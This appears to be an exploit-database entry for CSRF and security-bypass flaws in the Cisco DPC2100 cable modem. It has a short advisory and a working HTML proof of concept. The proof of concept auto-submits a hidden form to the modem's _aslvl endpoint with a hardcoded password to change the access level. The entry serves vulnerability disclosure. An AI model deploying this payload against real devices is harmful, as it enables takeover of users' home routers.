header-logo
Suggest Exploit
vendor:
Cisco DPC2100
by:
Unknown
7.5
CVSS
HIGH
Security-Bypass and Cross-Site Request-Forgery
Unknown
CWE
Product Name: Cisco DPC2100
Affected Version From: Unknown
Affected Version To: 2.0.2.r1256-100324as
Patch Exists: NO
Related CWE: Unknown
CPE: h:cisco:dpc2100
Metasploit:
Other Scripts:
Platforms Tested:
Unknown

Multiple Security-Bypass and Cross-Site Request-Forgery Vulnerabilities in Cisco DPC2100

The Cisco DPC2100 modem is prone to multiple security-bypass and cross-site request-forgery vulnerabilities. Successful exploits may allow attackers to run privileged commands, change configuration settings, modify device firmware, cause denial-of-service conditions, or inject arbitrary script code. Other attacks are also possible.

Mitigation:

Unknown
Source

Exploit-DB raw data:

source: https://www.securityfocus.com/bid/40346/info

Cisco DPC2100 (formerly Scientific Atlanta DPC2100) is prone to multiple security-bypass and cross-site request-forgery vulnerabilities.

Successful exploits may allow attackers to run privileged commands on the affected device, change configuration settings, modify device firmware, cause denial-of-service conditions, or inject arbitrary script code. Other attacks are also possible.

Firmware versions prior to 2.0.2.r1256-100324as are vulnerable. 

<html> <head> <title>Test for CSRF vulnerability in WebSTAR modems</title> </head> <body> <form name="csrf" method="post" action="http://192.168.100.1/goform/_aslvl"> <input type="hidden" name="SAAccessLevel" value="0"> <input type="hidden" name="SAPassword" value="W2402"> </form> <script>document.csrf.submit()</script> </body> </html>